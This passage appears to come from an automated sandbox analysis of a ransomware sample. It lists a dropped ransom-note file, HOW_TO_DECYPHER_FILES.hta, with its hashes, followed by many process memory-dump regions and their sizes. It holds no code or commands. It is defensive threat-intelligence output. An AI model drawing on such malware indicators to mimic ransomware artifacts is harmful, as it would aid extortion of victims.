                                                                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                                              SHA512

                                                                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                                            • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              917d9efe3bc21adc0924266e96e8bbdd

                                                                                                                                                              SHA1

                                                                                                                                                              6a3194864cc28dc55c8ef05c9a9c58444275246c

                                                                                                                                                              SHA256

                                                                                                                                                              bc941755495611179a8b2832ab619449ff7253430c68c544f12291de309f28e4

                                                                                                                                                              SHA512

                                                                                                                                                              3b3f82b618325a8b2dfa1594ea46ca47e6d6d470156d3a51d26c68a74dabe9335ac1659e071f59991f40afc3dea08b8b2b114a4ea8357e0b2d8d35289022d07c

                                                                                                                                                            • memory/348-9-0x000001700A690000-0x000001700A6A0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/348-51-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/348-26-0x000001700A690000-0x000001700A6A0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/348-13-0x0000017022EF0000-0x0000017022F66000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              472KB

                                                                                                                                                            • memory/348-10-0x0000017022D40000-0x0000017022D62000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              136KB

                                                                                                                                                            • memory/348-7-0x000001700A690000-0x000001700A6A0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/348-6-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/520-68-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/520-84-0x000002627EE00000-0x000002627EE10000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/520-356-0x000002627EE00000-0x000002627EE10000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/520-345-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/1116-55-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/1116-63-0x0000015FEB7C0000-0x0000015FEB7D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1116-312-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/1116-61-0x0000015FEB7C0000-0x0000015FEB7D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1116-337-0x0000015FEB7C0000-0x0000015FEB7D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1116-258-0x0000015FEB7C0000-0x0000015FEB7D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1116-341-0x0000015FEB7C0000-0x0000015FEB7D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1844-116-0x000001F5A7400000-0x000001F5A7410000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1844-136-0x000001F5A7400000-0x000001F5A7410000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1844-377-0x000001F5A7400000-0x000001F5A7410000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1844-113-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/1928-75-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/1928-1-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/1928-2-0x000000001B940000-0x000000001B950000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/1928-0-0x0000000000CA0000-0x0000000000CBC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/1928-134-0x000000001B940000-0x000000001B950000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2108-407-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2108-363-0x000001AF5ED80000-0x000001AF5ED90000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2108-94-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2280-150-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2280-166-0x000001E8C3920000-0x000001E8C3930000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2280-157-0x000001E8C3920000-0x000001E8C3930000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2336-129-0x000002656FFF0000-0x0000026570000000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2336-127-0x000002656FFF0000-0x0000026570000000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2336-102-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/2336-315-0x000002656FFF0000-0x0000026570000000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2616-132-0x0000020652FD0000-0x0000020652FE0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2616-141-0x0000020652FD0000-0x0000020652FE0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/2616-139-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/3604-131-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/3604-142-0x000002247F400000-0x000002247F410000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/3604-144-0x000002247F400000-0x000002247F410000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4292-108-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4292-115-0x0000014839A20000-0x0000014839A30000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4292-104-0x0000014839A20000-0x0000014839A30000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4292-370-0x0000014839A20000-0x0000014839A30000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4416-87-0x000001A3D35C0000-0x000001A3D35D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4416-81-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4416-305-0x000001A3D35C0000-0x000001A3D35D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4416-414-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4416-399-0x000001A3D35C0000-0x000001A3D35D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4416-89-0x000001A3D35C0000-0x000001A3D35D0000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4460-385-0x000001F922320000-0x000001F922330000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4460-392-0x000001F922320000-0x000001F922330000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4460-153-0x000001F922320000-0x000001F922330000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4460-60-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4460-72-0x000001F922320000-0x000001F922330000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4460-70-0x000001F922320000-0x000001F922330000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4460-333-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4948-105-0x0000020A43C10000-0x0000020A43C20000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4948-92-0x00007FFF5C460000-0x00007FFF5CE4C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              9.9MB

                                                                                                                                                            • memory/4948-97-0x0000020A43C10000-0x0000020A43C20000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/4948-318-0x0000020A43C10000-0x0000020A43C20000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              64KB